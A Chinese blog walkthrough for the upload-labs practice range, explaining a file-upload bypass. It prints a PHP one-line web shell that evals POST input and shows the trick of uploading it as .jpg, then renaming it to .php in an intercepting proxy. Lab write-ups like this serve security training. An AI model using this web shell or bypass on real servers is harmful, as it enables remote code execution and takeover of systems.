文件上传漏洞:upload-labs靶场通关9到15关保姆级详解-CSDN博客
第一关
第一种方法
尝试上传一个包含一下内容的php文件:
<?php
@eval($_POST['a']);
?>
-
<?php:这是PHP的开始标签,表示以下内容是PHP代码。
@eval($_POST['a']);:
- eval():这是一个PHP函数,用于将字符串作为PHP代码执行。它会将传入的字符串当作PHP代码来解析和执行。
- $_POST['a']:这是从HTTP POST请求中获取名为 a 的参数的值。攻击者可以通过发送一个POST请求,将恶意代码作为 a 参数的值传递给这个脚本
- 为了方便理解
- 111.php 是一个“命令执行器”,它会执行任何通过 a 参数传递给它的命令。攻击者可以通过发送一个特殊的请求,告诉这个“命令执行器”执行他们想要的任何代码。
一句话木马如果能够正常运行,确实会在服务器上产生一个后门。这种后门允许攻击者远程执行任意代码,从而完全控制服务器
将该php文件改成 jpg文件
可以正常传入
使用抓包工具
将filename111.jpg 改成 111.php